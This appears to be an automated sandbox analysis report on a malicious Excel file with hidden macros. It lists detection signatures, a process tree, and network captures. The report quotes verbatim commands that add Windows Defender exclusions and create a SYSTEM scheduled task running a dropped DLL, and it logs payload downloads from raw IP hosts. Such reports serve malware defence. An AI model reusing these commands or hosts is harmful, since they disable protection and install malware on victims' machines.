Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report Claim-680517779-09242021.xls

Overview

General Information

Sample Name:Claim-680517779-09242021.xls
Analysis ID:489833
MD5:a5e00f88df7d7fc328f759cd99bcd3a0
SHA1:b81aa5364f1fe9950dd0816082e9e2c7dcfa2375
SHA256:a2e451f2873b727520bef058f84303de9991e4353aa5ed3589350b7ce6e92506
Infos:

Most interesting Screenshot:

Detection

Hidden Macro 4.0
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Document exploit detected (drops PE files)
Sigma detected: Schedule system process
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Maps a DLL or memory area into another process
Overwrites code with unconditional jumps - possibly settings hooks in foreign process
Office process drops PE file
Writes to foreign memory regions
Uses cmd line tools excessively to alter registry or file data
Sigma detected: Microsoft Office Product Spawning Windows Shell
Allocates memory in foreign processes
Injects code into the Windows Explorer (explorer.exe)
Sigma detected: Regsvr32 Command Line Without DLL
Drops PE files to the user root directory
Document exploit detected (process start blacklist hit)
Document exploit detected (UrlDownloadToFile)
Yara detected hidden Macro 4.0 in Excel
Uses schtasks.exe or at.exe to add and modify task schedules
Queries the volume information (name, serial number etc) of a device
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Found evasive API chain (date check)
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Downloads executable code via HTTP
Abnormal high CPU Usage
Drops files with a non-matching file extension (content does not match file extension)
PE file does not import any functions
Potential document exploit detected (unknown TCP traffic)
PE file contains an invalid checksum
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Found evasive API chain checking for process token information
Uses reg.exe to modify the Windows registry
Document contains embedded VBA macros
Drops PE files to the user directory
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 1180 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
    • regsvr32.exe (PID: 1912 cmdline: regsvr32 -silent ..\Fiosa.der MD5: 59BCE9F07985F8A4204F4D6554CFF708)
      • regsvr32.exe (PID: 1760 cmdline: -silent ..\Fiosa.der MD5: 432BE6CF7311062633459EEF6B242FB5)
        • explorer.exe (PID: 2520 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 6DDCA324434FFA506CF7DC4E51DB7935)
          • schtasks.exe (PID: 2604 cmdline: 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn xtirgcvnp /tr 'regsvr32.exe -s \'C:\Users\user\Fiosa.der\'' /SC ONCE /Z /ST 16:03 /ET 16:15 MD5: 2003E9B15E1C502B146DAD2E383AC1E3)
    • regsvr32.exe (PID: 2428 cmdline: regsvr32 -silent ..\Fiosa1.der MD5: 59BCE9F07985F8A4204F4D6554CFF708)
      • regsvr32.exe (PID: 1724 cmdline: -silent ..\Fiosa1.der MD5: 432BE6CF7311062633459EEF6B242FB5)
        • explorer.exe (PID: 236 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 6DDCA324434FFA506CF7DC4E51DB7935)
    • regsvr32.exe (PID: 804 cmdline: regsvr32 -silent ..\Fiosa2.der MD5: 59BCE9F07985F8A4204F4D6554CFF708)
      • regsvr32.exe (PID: 152 cmdline: -silent ..\Fiosa2.der MD5: 432BE6CF7311062633459EEF6B242FB5)
        • explorer.exe (PID: 1408 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 6DDCA324434FFA506CF7DC4E51DB7935)
  • regsvr32.exe (PID: 2960 cmdline: regsvr32.exe -s 'C:\Users\user\Fiosa.der' MD5: 59BCE9F07985F8A4204F4D6554CFF708)
    • regsvr32.exe (PID: 2536 cmdline: -s 'C:\Users\user\Fiosa.der' MD5: 432BE6CF7311062633459EEF6B242FB5)
      • explorer.exe (PID: 1256 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 6DDCA324434FFA506CF7DC4E51DB7935)
        • reg.exe (PID: 2932 cmdline: C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\ProgramData\Microsoft\Frdsfsne' /d '0' MD5: 9D0B3066FE3D1FD345E86BC7BCCED9E4)
        • reg.exe (PID: 2788 cmdline: C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\Users\user\AppData\Roaming\Microsoft\Ltnurpxor' /d '0' MD5: 9D0B3066FE3D1FD345E86BC7BCCED9E4)
  • regsvr32.exe (PID: 2320 cmdline: regsvr32.exe -s 'C:\Users\user\Fiosa.der' MD5: 59BCE9F07985F8A4204F4D6554CFF708)
    • regsvr32.exe (PID: 2940 cmdline: -s 'C:\Users\user\Fiosa.der' MD5: 432BE6CF7311062633459EEF6B242FB5)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
Claim-680517779-09242021.xlsJoeSecurity_HiddenMacroYara detected hidden Macro 4.0 in ExcelJoe Security

    Sigma Overview

    System Summary:

    barindex
    Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
    Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: regsvr32 -silent ..\Fiosa.der, CommandLine: regsvr32 -silent ..\Fiosa.der, CommandLine|base64offset|contains: ,, Image: C:\Windows\System32\regsvr32.exe, NewProcessName: C:\Windows\System32\regsvr32.exe, OriginalFileName: C:\Windows\System32\regsvr32.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 1180, ProcessCommandLine: regsvr32 -silent ..\Fiosa.der, ProcessId: 1912
    Sigma detected: Regsvr32 Command Line Without DLLShow sources
    Source: Process startedAuthor: Florian Roth: Data: Command: -silent ..\Fiosa.der, CommandLine: -silent ..\Fiosa.der, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\regsvr32.exe, NewProcessName: C:\Windows\SysWOW64\regsvr32.exe, OriginalFileName: C:\Windows\SysWOW64\regsvr32.exe, ParentCommandLine: regsvr32 -silent ..\Fiosa.der, ParentImage: C:\Windows\System32\regsvr32.exe, ParentProcessId: 1912, ProcessCommandLine: -silent ..\Fiosa.der, ProcessId: 1760

    Persistence and Installation Behavior:

    barindex
    Sigma detected: Schedule system processShow sources
    Source: Process startedAuthor: Joe Security: Data: Command: 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn xtirgcvnp /tr 'regsvr32.exe -s \'C:\Users\user\Fiosa.der\'' /SC ONCE /Z /ST 16:03 /ET 16:15, CommandLine: 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn xtirgcvnp /tr 'regsvr32.exe -s \'C:\Users\user\Fiosa.der\'' /SC ONCE /Z /ST 16:03 /ET 16:15, CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Windows\SysWOW64\explorer.exe, ParentImage: C:\Windows\SysWOW64\explorer.exe, ParentProcessId: 2520, ProcessCommandLine: 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn xtirgcvnp /tr 'regsvr32.exe -s \'C:\Users\user\Fiosa.der\'' /SC ONCE /Z /ST 16:03 /ET 16:15, ProcessId: 2604

    Jbx Signature Overview

    Click to jump to signature section

    Show All Signature Results
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
    Source: Binary string: amstream.pdb source: explorer.exe, 00000006.00000003.516885155.0000000002581000.00000004.00000001.sdmp
    Source: Binary string: c:\chart-Green\Vowel-list\Place\935\Day.pdb source: regsvr32.exe, 00000004.00000002.516667603.000000001002A000.00000002.00020000.sdmp, explorer.exe, 00000006.00000003.518565464.0000000002581000.00000004.00000001.sdmp, regsvr32.exe, 00000009.00000002.574668774.000000001002A000.00000002.00020000.sdmp, regsvr32.exe, 0000000C.00000002.582087753.000000001002A000.00000002.00020000.sdmp
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_1000AEB4 FindFirstFileW,FindNextFileW,
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 6_2_000CAEB4 FindFirstFileW,FindNextFileW,
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_000CAEB4 FindFirstFileW,FindNextFileW,
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 17_2_0008AEB4 FindFirstFileW,FindNextFileW,

    Software Vulnerabilities:

    barindex
    Document exploit detected (drops PE files)Show sources
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: 44463.6668827546[1].dat.0.drJump to dropped file
    Document exploit detected (process start blacklist hit)Show sources
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe
    Document exploit detected (UrlDownloadToFile)Show sources
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXESection loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA
    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 190.14.37.173:80
    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 190.14.37.173:80
    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Fri, 24 Sep 2021 13:59:28 GMTContent-Type: application/octet-streamContent-Length: 495616Connection: keep-aliveX-Powered-By: PHP/5.4.16Accept-Ranges: bytesExpires: 0Cache-Control: no-cache, no-store, must-revalidateContent-Disposition: attachment; filename="44463.6668827546.dat"Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 54 fd 0e a4 10 9c 60 f7 10 9c 60 f7 10 9c 60 f7 d3 93 00 f7 13 9c 60 f7 87 58 1e f7 11 9c 60 f7 37 5a 1d f7 32 9c 60 f7 37 5a 0e f7 96 9c 60 f7 d3 93 3e f7 17 9c 60 f7 10 9c 61 f7 bb 9c 60 f7 37 5a 0f f7 47 9c 60 f7 37 5a 1a f7 11 9c 60 f7 37 5a 1c f7 11 9c 60 f7 37 5a 19 f7 11 9c 60 f7 52 69 63 68 10 9c 60 f7 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 27 1e 07 45 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 08 00 00 90 02 00 00 f0 0e 00 00 00 00 00 df 31 00 00 00 10 00 00 00 a0 02 00 00 00 00 10 00 10 00 00 00 10 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 90 11 00 00 10 00 00 7b af 07 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 3f 07 00 d6 00 00 00 04 39 07 00 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 11 00 e0 0f 00 00 70 a1 02 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 2f 07 00 40 00 00 00 00 00 00 00 00 00 00 00 00 a0 02 00 2c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 35 8e 02 00 00 10 00 00 00 90 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 b6 a0 04 00 00 a0 02 00 00 b0 04 00 00 a0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 0b 0a 00 00 50 07 00 00 10 00 00 00 50 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 e6 24 00 00 00 60 11 00 00 30 00 00 00 60 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Fri, 24 Sep 2021 13:59:32 GMTContent-Type: application/octet-streamContent-Length: 495616Connection: keep-aliveX-Powered-By: PHP/5.4.16Accept-Ranges: bytesExpires: 0Cache-Control: no-cache, no-store, must-revalidateContent-Disposition: attachment; filename="44463.6668827546.dat"Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 54 fd 0e a4 10 9c 60 f7 10 9c 60 f7 10 9c 60 f7 d3 93 00 f7 13 9c 60 f7 87 58 1e f7 11 9c 60 f7 37 5a 1d f7 32 9c 60 f7 37 5a 0e f7 96 9c 60 f7 d3 93 3e f7 17 9c 60 f7 10 9c 61 f7 bb 9c 60 f7 37 5a 0f f7 47 9c 60 f7 37 5a 1a f7 11 9c 60 f7 37 5a 1c f7 11 9c 60 f7 37 5a 19 f7 11 9c 60 f7 52 69 63 68 10 9c 60 f7 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 27 1e 07 45 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 08 00 00 90 02 00 00 f0 0e 00 00 00 00 00 df 31 00 00 00 10 00 00 00 a0 02 00 00 00 00 10 00 10 00 00 00 10 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 90 11 00 00 10 00 00 7b af 07 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 3f 07 00 d6 00 00 00 04 39 07 00 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 11 00 e0 0f 00 00 70 a1 02 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 2f 07 00 40 00 00 00 00 00 00 00 00 00 00 00 00 a0 02 00 2c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 35 8e 02 00 00 10 00 00 00 90 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 b6 a0 04 00 00 a0 02 00 00 b0 04 00 00 a0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 0b 0a 00 00 50 07 00 00 10 00 00 00 50 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 e6 24 00 00 00 60 11 00 00 30 00 00 00 60 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Fri, 24 Sep 2021 13:59:50 GMTContent-Type: application/octet-streamContent-Length: 495616Connection: keep-aliveX-Powered-By: PHP/5.4.16Accept-Ranges: bytesExpires: 0Cache-Control: no-cache, no-store, must-revalidateContent-Disposition: attachment; filename="44463.6668827546.dat"Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 54 fd 0e a4 10 9c 60 f7 10 9c 60 f7 10 9c 60 f7 d3 93 00 f7 13 9c 60 f7 87 58 1e f7 11 9c 60 f7 37 5a 1d f7 32 9c 60 f7 37 5a 0e f7 96 9c 60 f7 d3 93 3e f7 17 9c 60 f7 10 9c 61 f7 bb 9c 60 f7 37 5a 0f f7 47 9c 60 f7 37 5a 1a f7 11 9c 60 f7 37 5a 1c f7 11 9c 60 f7 37 5a 19 f7 11 9c 60 f7 52 69 63 68 10 9c 60 f7 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 27 1e 07 45 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 08 00 00 90 02 00 00 f0 0e 00 00 00 00 00 df 31 00 00 00 10 00 00 00 a0 02 00 00 00 00 10 00 10 00 00 00 10 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 90 11 00 00 10 00 00 7b af 07 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 3f 07 00 d6 00 00 00 04 39 07 00 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 11 00 e0 0f 00 00 70 a1 02 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 2f 07 00 40 00 00 00 00 00 00 00 00 00 00 00 00 a0 02 00 2c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 35 8e 02 00 00 10 00 00 00 90 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 b6 a0 04 00 00 a0 02 00 00 b0 04 00 00 a0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 0b 0a 00 00 50 07 00 00 10 00 00 00 50 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 e6 24 00 00 00 60 11 00 00 30 00 00 00 60 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    Source: global trafficHTTP traffic detected: GET /44463.6668827546.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 190.14.37.173Connection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /44463.6668827546.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 111.90.148.104Connection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /44463.6668827546.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 51.89.115.111Connection: Keep-Alive
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.173
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.173
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.173
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.173
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.173
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.173
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.173
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.173
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.173
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.173
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.173
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.173
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.173
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.173
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.173
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.173
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.173
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.173
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.173
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.173
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.173
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.173
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.173
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.173
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.173
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.173
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.173
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.173
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.173
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.173
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.173
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.173
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.173
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.173
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.173
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.173
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.173
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.173
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.173
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.173
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.173
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.173
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.173
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.173
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.173
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.173
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.173
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.173
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.173
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.173
    Source: regsvr32.exe, 00000004.00000002.515971633.00000000022C0000.00000002.00020000.sdmp, explorer.exe, 00000006.00000002.895240886.0000000002090000.00000002.00020000.sdmp, regsvr32.exe, 00000009.00000002.574258941.00000000021B0000.00000002.00020000.sdmp, regsvr32.exe, 00000019.00000002.753582688.0000000000F20000.00000002.00020000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
    Source: regsvr32.exe, 00000003.00000002.518300285.0000000001D40000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.515596084.0000000001DD0000.00000002.00020000.sdmp, regsvr32.exe, 00000007.00000002.575010843.0000000001D00000.00000002.00020000.sdmp, regsvr32.exe, 00000009.00000002.574000225.0000000001EB0000.00000002.00020000.sdmp, regsvr32.exe, 0000000B.00000002.583955951.00000000008E0000.00000002.00020000.sdmp, regsvr32.exe, 0000000C.00000002.581362480.0000000000A50000.00000002.00020000.sdmpString found in binary or memory: http://servername/isapibackend.dll
    Source: regsvr32.exe, 00000004.00000002.515971633.00000000022C0000.00000002.00020000.sdmp, explorer.exe, 00000006.00000002.895240886.0000000002090000.00000002.00020000.sdmp, regsvr32.exe, 00000009.00000002.574258941.00000000021B0000.00000002.00020000.sdmp, regsvr32.exe, 00000019.00000002.753582688.0000000000F20000.00000002.00020000.sdmpString found in binary or memory: http://www.%s.comPA
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44463.6668827546[1].datJump to behavior
    Source: global trafficHTTP traffic detected: GET /44463.6668827546.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 190.14.37.173Connection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /44463.6668827546.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 111.90.148.104Connection: Keep-Alive
